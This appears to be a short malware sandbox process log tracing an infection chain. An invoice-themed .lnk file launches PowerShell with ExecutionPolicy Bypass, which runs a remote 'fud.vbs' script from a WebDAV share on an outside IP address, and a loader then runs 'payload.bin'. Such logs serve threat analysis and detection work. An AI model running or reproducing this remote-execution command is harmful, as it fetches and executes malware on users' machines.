cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xHJKTUvBU" C:\Users\test22\AppData\Local\Temp\Invoice_88737.lnk
3020powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass \\154.53.50.79@8081\DavWWWRoot\fud.vbs
2160explorer.exe C:\Windows\Explorer.EXE
1236load.exe load payload.bin
2468